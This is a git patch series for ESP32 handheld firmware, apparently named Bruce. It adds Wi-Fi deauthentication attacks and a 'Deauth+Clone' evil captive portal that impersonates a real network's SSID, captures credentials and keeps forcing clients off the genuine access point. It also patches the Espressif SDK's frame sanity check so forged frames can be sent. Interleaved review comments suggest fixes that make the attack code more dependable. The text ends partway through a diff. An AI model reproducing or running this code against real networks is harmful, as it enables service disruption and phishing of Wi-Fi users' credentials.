From ff0125c446dacb3ad62e0c90c0b4a19a1161c238 Mon Sep 17 00:00:00 2001 From: Pirata Date: Fri, 10 May 2024 17:25:44 -0300 Subject: [PATCH 1/2] deauth errors --- deauth_setup.bat | 5 +- src/TV-B-Gone.cpp | 230 +------------------------------------------- src/evil_portal.cpp | 36 ++++++- src/evil_portal.h | 2 +- src/globals.h | 1 - src/main.cpp | 3 +- src/wifi_atks.cpp | 213 ++++++++++++++++++++++++++++++++++++++++ src/wifi_atks.h | 34 +++++++ src/wifi_common.cpp | 6 -- 9 files changed, 288 insertions(+), 242 deletions(-) create mode 100644 src/wifi_atks.cpp create mode 100644 src/wifi_atks.h diff --git a/deauth_setup.bat b/deauth_setup.bat index 3f8dd516a..a18b90dc4 100644 --- a/deauth_setup.bat +++ b/deauth_setup.bat @@ -9,7 +9,7 @@ set "esp32_file2=%userprofile%\.platformio\packages\framework-arduinoespressif32 set "esp32s3_file2=%userprofile%\.platformio\packages\framework-arduinoespressif32\tools\sdk\esp32s3\lib\libnet80211_temp.a" rem Now execute objcopy commands (only if backups were created) -%userprofile%\.platformio\packages\toolchain-xtensa-esp32\xtensa-esp32-elf\bin\objcopy --weaken-symbol=ieee80211_raw_frame_sanity_check %esp32_file% %esp32_file2% +"%userprofile%"\.platformio\packages\toolchain-xtensa-esp32\xtensa-esp32-elf\bin\objcopy --weaken-symbol=ieee80211_raw_frame_sanity_check "%esp32_file%" "%esp32_file2%" rem Rename the original file to .old ren "%esp32_file%" "libnet80211.a.old" 
@@ -18,7 +18,7 @@ rem Rename the _temp to original ren "%esp32_file2%" "libnet80211.a" rem Now execute objcopy commands (only if backups were created) -%userprofile%\.platformio\packages\toolchain-xtensa-esp32s3\xtensa-esp32s3-elf\bin\objcopy --weaken-symbol=ieee80211_raw_frame_sanity_check %esp32s3_file% %esp32s3_file2% +"%userprofile%"\.platformio\packages\toolchain-xtensa-esp32s3\xtensa-esp32s3-elf\bin\objcopy --weaken-symbol=ieee80211_raw_frame_sanity_check "%esp32s3_file%" "%esp32s3_file2%" rem Rename the original file to .old ren "%esp32s3_file%" "libnet80211.a.old" @@ -26,4 +26,5 @@ ren "%esp32s3_file%" "libnet80211.a.old" rem Rename the _temp to original ren "%esp32s3_file2%" "libnet80211.a" +PAUSE diff --git a/src/TV-B-Gone.cpp b/src/TV-B-Gone.cpp index 9257aa8c1..cb1f98b33 100644 --- a/src/TV-B-Gone.cpp +++ b/src/TV-B-Gone.cpp 
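Review bot: The objcopy → ren → ren chain in this hunk never checks that objcopy succeeded, so on a host where the toolchain path or libnet80211.a is missing the original is still renamed to .old and nothing is put back in its place, while the `rem ... (only if backups were created)` comment promises a condition the visible lines do not implement. A guard before each rename, e.g. `if errorlevel 1 ( echo objcopy failed & goto :eof )` or `if not exist "%esp32s3_file2%" goto :eof`, keeps the framework install intact on failure. It is also worth stating in the script header that this weakens `ieee80211_raw_frame_sanity_check` in the shared PlatformIO framework copy under %userprofile%, so every other project on that machine links against the patched library, not just this firmware.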
@@ -1,48 +1,7 @@ /* Last Updated: 30 Mar. 2018 By Anton Grimpelhuber (anton.grimpelhuber@gmail.com) - ------------------------------------------------------------ -Semver (http://semver.org/) VERSION HISTORY (newest on top): -(date format: yyyymmdd; ex: 20161022 is 22 Oct. 2016) ------------------------------------------------------------- - - 20180330 - v1.4 - First port to ESP8266 (tested: wemos D1 mini) by Anton Grimpelhuber - - 20161022 - v1.3 - Semver versioning implemented; various code updates, clarifications, & comment additions, and changes to fix incompatibilities so it will now compile with latest versions of gcc compiler; also improved blink indicator routines & added the ability to stop the code-sending sequence once it has begun; by Gabriel Staples (http://www.ElectricRCAircraftGuy.com) - - 20101023 - v1.2 - Latest version posted by Ken Shirriff on his website here (http://www.righto.com/2010/11/improved-arduino-tv-b-gone.html) (direct download link here: http://arcfn.com/files/arduino-tv-b-gone-1.2.zip) - - 20101018 - v1.2 - Universality for EU (European Union) & NA (North America) added by Mitch Altman; sleep mode added by ka1kjz - - 2010____ - v1.2 - code ported to Arduino; by Ken Shirriff - - 20090816 - v1.2 - for ATtiny85v, by Mitch Altman & Limor Fried (https://www.adafruit.com/), w/some code by Kevin Timmerman & Damien Good - -TV-B-Gone for Arduino version 1.2, Oct 23 2010 -Ported to Arduino by Ken Shirriff -See here: http://www.arcfn.com/2009/12/tv-b-gone-for-arduino.html and here: http://www.righto.com/2010/11/improved-arduino-tv-b-gone.html (newer) - -I added universality for EU (European Union) or NA (North America), -and Sleep mode to Ken's Arduino port - -- Mitch Altman 18-Oct-2010 -Thanks to ka1kjz for the code for Sleep - - -The original code is: -TV-B-Gone Firmware version 1.2 - for use with ATtiny85v and v1.2 hardware - (c) Mitch Altman + Limor Fried 2009 - Last edits, August 16 2009 - -With some code from: -Kevin Timmerman & Damien 
Good 7-Dec-07 ------------------------------------------------------------- -CIRCUIT: ------------------------------------------------------------- --NB: SEE "main.h" TO VERIFY DEFINED PINS TO USE -The hardware for this project uses a wemos D1 mini ESP8266-based board: - Connect an IR LED to pin 14 / D5 (IRLED). - Uses the built-in LED via pin 2. - Connect a push-button between pin 12 / D6 (TRIGGER) and ground. - Pin 5 / D1 (REGIONSWITCH) must be left floating for North America, or wire it to ground to have it output European codes. - -More about the wiring is written in the readme. ------------------------------------------------------------ LICENSE: ------------------------------------------------------------ @@ -59,12 +18,6 @@ Distributed under Creative Commons 2.5 -- Attribution & Share Alike uint8_t read_bits(uint8_t count); uint16_t rawData[300]; - -#define putstring_nl(s) Serial.println(s) -#define putstring(s) Serial.print(s) -#define putnum_ud(n) Serial.print(n, DEC) -#define putnum_uh(n) Serial.print(n, HEX) - #define IR_DATA_BUFFER_SIZE 300 File databaseFile; 
@@ -81,44 +34,8 @@ uint8_t num_EUcodes = NUM_ELEM(EUpowerCodes); uint16_t ontime, offtime; uint8_t i,num_codes; uint8_t region; -/* -This project transmits a bunch of TV POWER codes, one right after the other, - with a pause in between each. (To have a visible indication that it is - transmitting, it also pulses a visible LED once each time a POWER code is - transmitted.) That is all TV-B-Gone does. The tricky part of TV-B-Gone - was collecting all of the POWER codes, and getting rid of the duplicates and - near-duplicates (because if there is a duplicate, then one POWER code will - turn a TV off, and the duplicate will turn it on again (which we certainly - do not want). I have compiled the most popular codes with the - duplicates eliminated, both for North America (which is the same as Asia, as - far as POWER codes are concerned -- even though much of Asia USES PAL video) - and for Europe (which works for Australia, New Zealand, the Middle East, and - other parts of the world that use PAL video). - - Before creating a TV-B-Gone Kit, I originally started this project by hacking - the MiniPOV kit. This presents a limitation, based on the size of - the Atmel ATtiny2313 internal flash memory, which is 2KB. With 2KB we can only - fit about 7 POWER codes into the firmware's database of POWER codes. However, - the more codes the better! Which is why we chose the ATtiny85 for the - TV-B-Gone Kit. - - This version of the firmware has the most popular 100+ POWER codes for - North America and 100+ POWER codes for Europe. You can select which region - to use by soldering a 10K pulldown resistor. - */ -/* -This project is a good example of how to use the AVR chip timers. - */ - -/* This is kind of a strange but very useful helper function - Because we are using compression, we index to the timer table - not with a full 8-bit byte (which is wasteful) but 2 or 3 bits. 
- Once code_ptr is set up to point to the right part of memory, - this function will let us read 'count' bits at a time which - it does by reading a byte into 'bits_r' and then buffering it. */ - // we cant read more than 8 bits at a time so dont try! uint8_t read_bits(uint8_t count) { 
@@ -127,68 +44,22 @@ uint8_t read_bits(uint8_t count) // we need to read back count bytes for (i=0; icodes[code_ptr++]; - DEBUGP(putstring("\n\rGet byte: "); - putnum_uh(bits_r); - ); - // and reset the buffer size (8 bites in a byte) bitsleft_r = 8; } - // remove one bit bitsleft_r--; - // and shift it off of the end of 'bits_r' tmp |= (((bits_r >> (bitsleft_r)) & 1) << (count-1-i)); } - // return the selected bits in the LSB part of tmp return tmp; } - -/* Legacy explanation from old Arduino Code for reference -The C compiler creates code that will transfer all constants into RAM when - the microcontroller resets. Since this firmware has a table (powerCodes) - that is too large to transfer into RAM, the C compiler needs to be told to - keep it in program memory space. This is accomplished by the macro - (this is used in the definition for powerCodes). Since the C compiler assumes - that constants are in RAM, rather than in program memory, when accessing - powerCodes, we need to use the pgm_read_word() and pgm_read_byte macros, and - we need to use powerCodes as an address. This is done with PGM_P, defined - below. - For example, when we start a new powerCode, we first point to it with the - following statement: - PGM_P thecode_p = pgm_read_word(powerCodes+i); - The next read from the powerCode is a byte that indicates the carrier - frequency, read as follows: - const uint8_t freq = pgm_read_byte(code_ptr++); - After that is a byte that tells us how many 'onTime/offTime' pairs we have: - const uint8_t numpairs = pgm_read_byte(code_ptr++); - The next byte tells us the compression method. Since we are going to use a - timing table to keep track of how to pulse the LED, and the tables are - pretty short (usually only 4-8 entries), we can index into the table with only - 2 to 4 bits. 
Once we know the bit-packing-size we can decode the pairs - const uint8_t bitcompression = pgm_read_byte(code_ptr++); - Subsequent reads from the powerCode are n bits (same as the packing size) - that index into another table in ROM that actually stores the on/off times - const PGM_P time_ptr = (PGM_P)pgm_read_word(code_ptr); - */ - void chooseRegion(int reg) { region = reg; - if (reg) { - DEBUGP(putstring_nl("NA")); - num_codes=num_NAcodes; - } - else { - num_codes=num_EUcodes; - DEBUGP(putstring_nl("EU")); - } + if (reg) num_codes=num_NAcodes; + else num_codes=num_EUcodes; } - - void StartTvBGone() { Serial.begin(115200); 
@@ -209,112 +80,42 @@ void StartTvBGone() loopOptions(options); delay(200); - // Debug output: indicate how big our database is - if (region) { - DEBUGP(putstring("\n\rNA Codesize: "); - putnum_ud(num_NAcodes); - ); - } else { - DEBUGP(putstring("\n\rEU Codesize: "); - putnum_ud(num_EUcodes); - ); - } -/* - // Tell the user what region we're in - 3 flashes is NA, 6 is EU - if (region == NA) - quickflashLEDx(3); - else //region == EU - quickflashLEDx(6); -*/ sendAllCodes(); } void sendAllCodes() { bool endingEarly = false; //will be set to true if the user presses the button during code-sending - - // for every POWER code in our collection checkSelPress(); for (i=0 ; itimer_val; - // set OCR for Timer1 to output this POWER code's carrier frequency - - // Print out the frequency of the carrier and the PWM settings - DEBUGP(putstring("\n\rFrequency: "); - putnum_ud(freq); - ); - - DEBUGP(uint16_t x = (freq+1) * 2; - putstring("\n\rFreq: "); - putnum_ud(F_CPU/x); - ); - - // Get the number of pairs, the second byte from the code struct const uint8_t numpairs = powerCode->numpairs; - DEBUGP(putstring("\n\rOn/off pairs: "); - putnum_ud(numpairs)); - - // Get the number of bits we use to index into the timer table - // This is the third byte of the structure const uint8_t bitcompression = powerCode->bitcompression; - DEBUGP(putstring("\n\rCompression: "); - putnum_ud(bitcompression); - putstring("\n\r")); // For EACH pair in this code.... 
code_ptr = 0; for (uint8_t k=0; ktimes[ti]; // read word 1 - ontime offtime = powerCode->times[ti+1]; // read word 2 - offtime - DEBUGP(putstring("\n\rti = "); - putnum_ud(ti>>1); - putstring("\tPair = "); - putnum_ud(ontime)); - DEBUGP(putstring("\t"); - putnum_ud(offtime)); - rawData[k*2] = ontime * 10; rawData[(k*2)+1] = offtime * 10; yield(); } progressHandler(i, num_codes); - // Send Code with library irsend.sendRaw(rawData, (numpairs*2) , freq); - Serial.print("\n"); yield(); - //Flush remaining bits, so that next code starts - //with a fresh set of 8 bits. bitsleft_r=0; - // visible indication that a code has been output. quickflashLED(); - // delay 205 milliseconds before transmitting next POWER code delay_ten_us(20500); @@ -352,7 +153,6 @@ void sendAllCodes() //pause for ~1.3 sec, then flash the visible LED 8 times to indicate that we're done delay_ten_us(MAX_WAIT_TIME); // wait 655.350ms delay_ten_us(MAX_WAIT_TIME); // wait 655.350ms - //quickflashLEDx(8); } else { displayRedStripe("User Stoped"); } @@ -364,14 +164,6 @@ void sendAllCodes() /****************************** LED AND DELAY FUNCTIONS ********/ - -// This function delays the specified number of 10 microseconds -// it is 'hardcoded' and is calibrated by adjusting DELAY_CNT -// in main.h Unless you are changing the crystal from 8MHz, dont -// mess with this. -//-due to uint16_t datatype, max delay is 65535 tens of microseconds, or 655350 us, or 655.350 ms. -//-NB: DELAY_CNT has been increased in main.h from 11 to 25 (last I checked) in order to allow this function -// to work properly with 16MHz Arduinos now (instead of 8MHz). void delay_ten_us(uint16_t us) { uint8_t timer; while (us != 0) { 
@@ -395,20 +187,6 @@ void quickflashLED( void ) { digitalWrite(LED, LED_OFF); } -// This function just flashes the visible LED a couple times, used to -// tell the user what region is selected -void quickflashLEDx( uint8_t x ) { - quickflashLED(); - while(--x) { - delay_ten_us(25000); // 250 ms OFF-time delay between flashes - quickflashLED(); - } -} - - - - - ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Custom IR diff --git a/src/evil_portal.cpp b/src/evil_portal.cpp index 34603f938..1877b0ffd 100644 --- a/src/evil_portal.cpp +++ b/src/evil_portal.cpp @@ -3,6 +3,7 @@ #include "mykeyboard.h" #include "wifi_common.h" #include "sd_functions.h" +#include "wifi_atks.h" AsyncWebServer *ep; // initialise webserver DNSServer dnsServer; @@ -54,7 +55,7 @@ class CaptiveRequestHandler : public AsyncWebHandler { } }; -void startEvilPortal() { +void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) { bool redraw=true; Serial.begin(115200); // Definição da matriz "Options" @@ -66,7 +67,14 @@ void startEvilPortal() { loopOptions(options); while(checkNextPress()){ yield(); } // debounce - AP_name = keyboard("Free Wifi", 30, "Evil Portal SSID:"); + // tssid="" means that are opening a virgin Evil Portal + if (tssid=="") AP_name = keyboard("Free Wifi", 30, "Evil Portal SSID:"); + else { // tssid != "" means that is was cloned and can deploy Deauth + memcpy(ap_record.bssid, bssid, 6); + wsl_bypasser_send_raw_frame(&ap_record,channel); + AP_name = tssid; + } + while(checkNextPress()){ yield(); } // debounce IPAddress AP_GATEWAY(172, 0, 0, 1); 
@@ -117,8 +125,8 @@ void startEvilPortal() { drawMainMenu(0); menu_op.deleteSprite(); menu_op.createSprite(WIDTH-20, HEIGHT-35); - - while(!checkSelPress()) { + bool hold_deauth = false; + while(1) { if(totalCapturedCredentials!=previousTotalCapturedCredentials) { redraw=true; previousTotalCapturedCredentials = totalCapturedCredentials; @@ -139,13 +147,31 @@ void startEvilPortal() { menu_op.setTextSize(FP); menu_op.println(last_cred); + if (hold_deauth) { + menu_op.setTextSize(FP); + menu_op.setTextColor(BGCOLOR); + menu_op.drawRightString("Deauth OFF", menu_op.width(),menu_op.height()-8,SMOOTH_FONT); + } else { + menu_op.setTextSize(FP); + menu_op.setTextColor(TFT_RED); + menu_op.drawRightString("Deauth ON", menu_op.width(),menu_op.height()-8,SMOOTH_FONT); + } + menu_op.pushSprite(8,26); redraw=false; } + + if(!hold_deauth) wsl_bypasser_send_raw_frame(deauth_frame, 26); // sends deauth frames if needed. + + if(checkSelPress() && deauth) { + while(checkSelPress()) { yield(); } // timerless debounce + !hold_deauth; + } + dnsServer.processNextRequest(); } - while(checkSelPress()) { } + while(checkSelPress()) { yield(); } // timerless debounce displayWarning("Bruce will restart"); while(!checkSelPress()) { } // Evil Portal uses a lot of RAM memmory, and can't open Menus after that, need to restart. diff --git a/src/evil_portal.h b/src/evil_portal.h index 2e2869843..bb105d824 100644 --- a/src/evil_portal.h +++ b/src/evil_portal.h @@ -8,7 +8,7 @@ // function defaults -void startEvilPortal(); +void startEvilPortal(String tssid = "", uint8_t* bssid = nullptr, uint8_t channel = 1, bool deauth = false); void chooseHtml(bool def = true); diff --git a/src/globals.h b/src/globals.h index c0db7400a..cc6cb0ba4 100644 --- a/src/globals.h +++ b/src/globals.h @@ -52,4 +52,3 @@ extern bool returnToMenu; // variável para verificação e quebrar os loops void backToMenu(); - diff --git a/src/main.cpp b/src/main.cpp index 26056a775..b519cd2d5 100644 --- a/src/main.cpp +++ b/src/main.cpp 
@@ -48,6 +48,7 @@ TFT_eSprite draw = TFT_eSprite(&tft); #include "clients.h" #include "arp.h" #include "rf.h" +#include "wifi_atks.h" #ifdef CARDPUTER @@ -171,7 +172,7 @@ void loop() { {"Disconnect Wifi", [=]() { wifiDisconnect(); }}, //wifi_common.h }; } - options.push_back({"Wifi Atks", [=]() { displayRedStripe("Wifi Atks"); }}); + options.push_back({"Wifi Atks", [=]() { wifi_atk_menu(); }}); options.push_back({"TelNET", [=]() { telnet_setup(); }}); options.push_back({"SSH", [=]() { ssh_setup(); }}); options.push_back({"Raw Sniffer", [=]() { sniffer_setup(); }}); diff --git a/src/wifi_atks.cpp b/src/wifi_atks.cpp new file mode 100644 index 000000000..1ea148991 --- /dev/null +++ b/src/wifi_atks.cpp 
@@ -0,0 +1,213 @@ +// Borrowed from https://github.com/justcallmekoko/ESP32Marauder/ +// Learned from https://github.com/risinek/esp32-wifi-penetration-tool/ +// Arduino IDE needs to be tweeked to work, follow the instructions: https://github.com/justcallmekoko/ESP32Marauder/wiki/arduino-ide-setup +// But change the file in: C:\Users\\AppData\Local\Arduino15\packages\m5stack\hardware\esp32\2.0.9 +#include +#include "globals.h" +#include "wifi_atks.h" +#include "esp_wifi.h" +#include "esp_system.h" +#include "display.h" +#include "mykeyboard.h" +#include "evil_portal.h" + + +/** + * @brief Decomplied function that overrides original one at compilation time. + * + * @attention This function is not meant to be called! + * @see Project with original idea/implementation https://github.com/GANESH-ICMC/esp32-deauther +*/ +extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){ + if (arg == 31337) + return 1; + else + return 0; +} + + +// Default Drauth Frame +const uint8_t deauth_frame_default[] = { + 0xc0, 0x00, 0x3a, 0x01, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xf0, 0xff, 0x02, 0x00 +}; + +uint8_t deauth_frame[sizeof(deauth_frame_default)]; // 26 = [sizeof(deauth_frame_default[])] + +wifi_ap_record_t ap_record; + + +/*************************************************************************************** +** Function: send_raw_frame +** @brief: Broadcasts deauth frames +***************************************************************************************/ +void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size){ + Serial.begin(115200); + ESP_ERROR_CHECK(esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, sizeof(&frame_buffer), false)); + Serial.println(" -> Sent deauth frame"); +} + + +/*************************************************************************************** +** function: wsl_bypasser_send_raw_frame +** @brief: prepare the frame to 
deploy the attack +***************************************************************************************/ +void wsl_bypasser_send_raw_frame(const wifi_ap_record_t *ap_record, uint8_t chan){ + Serial.begin(115200); + Serial.print("\nPreparing deauth frame to -> "); + for (int j = 0; j < 6; j++) { + Serial.print(ap_record->bssid[j], HEX); + if (j < 5) Serial.print(":"); + } + esp_wifi_set_channel(chan, WIFI_SECOND_CHAN_NONE); + delay(50); + memcpy(&deauth_frame[10], ap_record->bssid, 6); + memcpy(&deauth_frame[16], ap_record->bssid, 6); +} + + +/*************************************************************************************** +** function: wifi_atk_info +** @brief: Open Wifi information screen +***************************************************************************************/ +void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel) { + //desenhar a tela + menu_op.deleteSprite(); + menu_op.createSprite(WIDTH-20, HEIGHT-35); + menu_op.fillRect(0,0, menu_op.width(),menu_op.height(), BGCOLOR); + menu_op.setTextColor(FGCOLOR); + menu_op.drawCentreString("-=Information=-", menu_op.width()/2,2,SMOOTH_FONT); + menu_op.drawString("AP: " + tssid,0,20); + menu_op.drawString("Channel: " + String(channel),0,38); + menu_op.drawString(mac,0,55); + menu_op.drawString("Press " + String(BTN_ALIAS) + " to act",0,menu_op.height()-20); + menu_op.pushSprite(6,26); + menu_op.deleteSprite(); + + delay(300); + while(!checkSelPress()) { + while(!checkSelPress()) { yield(); } // timerless debounce + target_atk_menu(bssid, tssid, mac, channel); + returnToMenu=true; + break; + } + +} + + +/*************************************************************************************** +** function: target_atk_menu +** @brief: Open menu to choose which AP Attack +***************************************************************************************/ +void wifi_atk_menu() { + int nets; + WiFi.mode(WIFI_MODE_STA); + displayScanning(); + nets=WiFi.scanNetworks(); + options 
= { }; + for(int i=0; i(WiFi.encryptionType(i))); }}); + } + options.push_back({"Main Menu", [=]() { backToMenu(); }}); + + delay(200); + loopOptions(options); + delay(200); +} +/*************************************************************************************** +** function: target_atk_menu +** @brief: Open menu to choose which AP Attack +***************************************************************************************/ +void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel) { + options = { + {"Deauth", [=]() { target_atk(bssid, tssid, mac, channel); }}, + {"Clone Portal", [=]() { startEvilPortal(tssid, bssid, channel,false); }}, + {"Deauth+Clone", [=]() { startEvilPortal(tssid, bssid, channel,true); }}, + {"Main Menu", [=]() { backToMenu(); }}, + }; + + delay(200); + loopOptions(options); + delay(200); +} + + +/*************************************************************************************** +** function: target_atk +** @brief: Deploy Target deauth +***************************************************************************************/ +void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel) { + Serial.begin(115200); + //criar o frame + memcpy(ap_record.bssid, bssid, 6); + WiFi.mode(WIFI_AP); + WiFi.softAP(tssid, emptyString, channel, 1, 4, false); + wifiConnected=true; + wsl_bypasser_send_raw_frame(&ap_record,channel); + + //loop com o ataque mostrando o numero de frames por segundo + int tmp = 0; + int count = 0; + tmp=millis(); + bool redraw = true; + delay(200); + checkSelPress(); + while(1) { + if(redraw) { + //desenhar a tela + menu_op.deleteSprite(); + menu_op.createSprite(WIDTH-20, HEIGHT-35); + menu_op.fillRect(0,0, menu_op.width(),menu_op.height(), BGCOLOR); + menu_op.setTextColor(TFT_RED); + menu_op.drawCentreString("Target Deauth", menu_op.width()/2,2,SMOOTH_FONT); + menu_op.setTextColor(FGCOLOR); + menu_op.drawString("AP: " + tssid,0,20); + menu_op.drawString("Channel: " + 
String(channel),0,38); + menu_op.drawString(mac,0,55); + menu_op.pushSprite(6,26); + redraw=false; + } + //Send frame + wsl_bypasser_send_raw_frame(deauth_frame, sizeof(deauth_frame_default)); + count++; + // atualize counter + if(millis()-tmp>1000) { + menu_op.setCursor(0,menu_op.height()-17); + menu_op.fillRect(0,menu_op.height()-17, menu_op.width(),17, BGCOLOR); + menu_op.print("Frames: " + String(count) + "/s"); + menu_op.pushSprite(6,26); + count=0; + tmp=millis(); + } + //Pause attack + if(checkSelPress()) { + displayRedStripe("Deauth Paused",TFT_WHITE,FGCOLOR); + while(checkSelPress()) { yield(); } // timeless debounce + // wait to restart or kick out of the function + while(!checkSelPress()) { + #ifndef CARDPUTER + if(checkPrevPress()) break; // Apertar o botão power dos sticks + #else + Keyboard.update(); + if(Keyboard.isKeyPressed('`')) break; // Apertar o ESC do cardputer + #endif + } + while(checkSelPress()) { yield(); } // timeless debounce + } + // Checks para sair do while + #ifndef CARDPUTER + if(checkPrevPress()) break; // Apertar o botão power dos sticks + #else + Keyboard.update(); + if(Keyboard.isKeyPressed('`')) break; // Apertar o ESC do cardputer + #endif + } + returnToMenu=true; +} + + + + diff --git a/src/wifi_atks.h b/src/wifi_atks.h new file mode 100644 index 000000000..adabf6440 --- /dev/null +++ b/src/wifi_atks.h 
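Review bot: The comment on `ieee80211_raw_frame_sanity_check` says the function overrides the original "at compilation time", but the override only takes effect at link time and only after the symbol in libnet80211.a has been weakened by deauth_setup.bat; as far as the diff shows nothing in the firmware detects that the step was skipped. I would replace it with `// Link-time override of the SDK frame sanity check. Requires libnet80211.a to have been patched by deauth_setup.bat (objcopy --weaken-symbol); otherwise the link fails on a duplicate symbol or the stock check stays active and esp_wifi_80211_tx rejects the forged frames.` The "Decomplied" and "Drauth" typos in the same hunk should read "Decompiled" and "Deauth".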
@@ -0,0 +1,34 @@ +#include + +extern wifi_ap_record_t ap_record; +// Default Drauth Frame +extern const uint8_t deauth_frame_default[]; + +extern uint8_t deauth_frame[]; // 26 = [sizeof(deauth_frame_default[])] + +/** + * @brief Sends frame in frame_buffer using esp_wifi_80211_tx but bypasses blocking mechanism + * + * @param frame_buffer + * @param size size of frame buffer + */ +void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size); + +/** + * @brief Sends deauthentication frame with forged source AP from given ap_record + * + * This will send deauthentication frame acting as frame from given AP, and destination will be broadcast + * MAC address - \c ff:ff:ff:ff:ff:ff + * + * @param ap_record AP record with valid AP information + * @param chan Channel of the targetted AP + */ +void wsl_bypasser_send_raw_frame(const wifi_ap_record_t *ap_record, uint8_t chan); + +void wifi_atk_info(uint8_t* bssid, String tssid,String mac, uint8_t channel); + +void wifi_atk_menu(); + +void target_atk_menu(uint8_t* bssid, String tssid,String mac, uint8_t channel); + +void target_atk(uint8_t* bssid, String tssid,String mac, uint8_t channel); \ No newline at end of file diff --git a/src/wifi_common.cpp b/src/wifi_common.cpp index 70b81a448..fceb3cf4f 100644 --- a/src/wifi_common.cpp +++ b/src/wifi_common.cpp @@ -97,9 +97,3 @@ void wifiConnectMenu(bool isAP) { } -extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){ - if (arg == 31337) - return 1; - else - return 0; -} \ No newline at end of file From 67fbe3c4aa3dade800df53656293808edc1f4e6b Mon Sep 17 00:00:00 2001 
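Review bot: wifi_atks.h has no `#pragma once` or include guard even though main.cpp, evil_portal.cpp and wifi_atks.cpp all include it; the declarations happen to tolerate re-inclusion today, but the first line should be `#pragma once` as is conventional. A naming point on the same hunk: the two `wsl_bypasser_send_raw_frame` overloads do different things — the `wifi_ap_record_t*` one only sets the channel and writes the BSSID into `deauth_frame` and sends nothing, although its @brief says it "Sends deauthentication frame with forged source AP". Either rename it (e.g. `wsl_bypasser_prepare_deauth_frame`) or correct the @brief to say it prepares `deauth_frame` for a later call to the buffer overload.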
From: Pirata <104320209+bmorcelli@users.noreply.github.com> Date: Fri, 10 May 2024 23:57:39 -0300 Subject: [PATCH 2/2] Deauth a, Deauth+Clone deauth working at 200 fps in normal mode and 100fps in clone mode --- src/evil_portal.cpp | 27 ++++++++++++++++++----- src/evil_portal.h | 2 +- src/wifi_atks.cpp | 53 ++++++++++++++++++++++++++++++--------------- src/wifi_atks.h | 6 ++--- 4 files changed, 61 insertions(+), 27 deletions(-) diff --git a/src/evil_portal.cpp b/src/evil_portal.cpp index 1877b0ffd..85520ec95 100644 --- a/src/evil_portal.cpp +++ b/src/evil_portal.cpp @@ -14,6 +14,14 @@ int totalCapturedCredentials = 0; int previousTotalCapturedCredentials = -1; // stupid hack but wtfe String capturedCredentialsHtml = ""; +// Default Drauth Frame +const uint8_t deauth_frame_default2[] = { + 0xc0, 0x00, 0x3a, 0x01, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xf0, 0xff, 0x02, 0x00 +}; class CaptiveRequestHandler : public AsyncWebHandler { public: @@ -55,7 +63,7 @@ class CaptiveRequestHandler : public AsyncWebHandler { } }; -void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) { +void startEvilPortal(String tssid, uint8_t channel, bool deauth) { bool redraw=true; Serial.begin(115200); // Definição da matriz "Options" @@ -70,7 +78,8 @@ void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) // tssid="" means that are opening a virgin Evil Portal if (tssid=="") AP_name = keyboard("Free Wifi", 30, "Evil Portal SSID:"); else { // tssid != "" means that is was cloned and can deploy Deauth - memcpy(ap_record.bssid, bssid, 6); + //memcpy(ap_record.bssid, bssid, 6); + memcpy(deauth_frame, deauth_frame_default2, sizeof(deauth_frame_default2)); wsl_bypasser_send_raw_frame(&ap_record,channel); AP_name = tssid; } 
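Review bot: `deauth_frame_default2` in this hunk is a byte-for-byte copy of `deauth_frame_default` from wifi_atks.cpp, which evil_portal.cpp already sees through wifi_atks.h; two copies of the forged frame template will drift the first time one is edited. The likely reason for the copy is that `sizeof` cannot be applied to the header's incomplete `extern const uint8_t deauth_frame_default[];`, so the clean fix is to give the header a size — `extern const uint8_t deauth_frame_default[26];` or a `constexpr size_t DEAUTH_FRAME_LEN = 26;` beside it — and then write `memcpy(deauth_frame, deauth_frame_default, DEAUTH_FRAME_LEN);` here and in target_atk, which also retires the bare `26` passed to `wsl_bypasser_send_raw_frame`. The duplicated `// Default Drauth Frame` comment carries the same typo; "Deauth".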
@@ -122,10 +131,12 @@ void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) ep->begin(); tft.fillRect(6, 27, WIDTH-12, HEIGHT-33, BGCOLOR); - drawMainMenu(0); + drawMainMenu(); menu_op.deleteSprite(); menu_op.createSprite(WIDTH-20, HEIGHT-35); bool hold_deauth = false; + int tmp=millis(); // one deauth frame each 30ms at least + checkSelPress(); while(1) { if(totalCapturedCredentials!=previousTotalCapturedCredentials) { redraw=true; @@ -161,11 +172,15 @@ void startEvilPortal(String tssid, uint8_t* bssid, uint8_t channel, bool deauth) redraw=false; } - if(!hold_deauth) wsl_bypasser_send_raw_frame(deauth_frame, 26); // sends deauth frames if needed. + if(!hold_deauth && (millis()-tmp) >20) { + wsl_bypasser_send_raw_frame(deauth_frame, 26); // sends deauth frames if needed. + tmp=millis(); + } if(checkSelPress() && deauth) { - while(checkSelPress()) { yield(); } // timerless debounce - !hold_deauth; + while(checkSelPress()) { delay(80); } // timerless debounce + hold_deauth = !hold_deauth; + redraw=true; } dnsServer.processNextRequest(); diff --git a/src/evil_portal.h b/src/evil_portal.h index bb105d824..6c45936e9 100644 --- a/src/evil_portal.h +++ b/src/evil_portal.h @@ -8,7 +8,7 @@ // function defaults -void startEvilPortal(String tssid = "", uint8_t* bssid = nullptr, uint8_t channel = 1, bool deauth = false); +void startEvilPortal(String tssid = "", uint8_t channel = 1, bool deauth = false); void chooseHtml(bool def = true); diff --git a/src/wifi_atks.cpp b/src/wifi_atks.cpp index 1ea148991..599c06ca8 100644 --- a/src/wifi_atks.cpp +++ b/src/wifi_atks.cpp @@ -10,6 +10,7 @@ #include 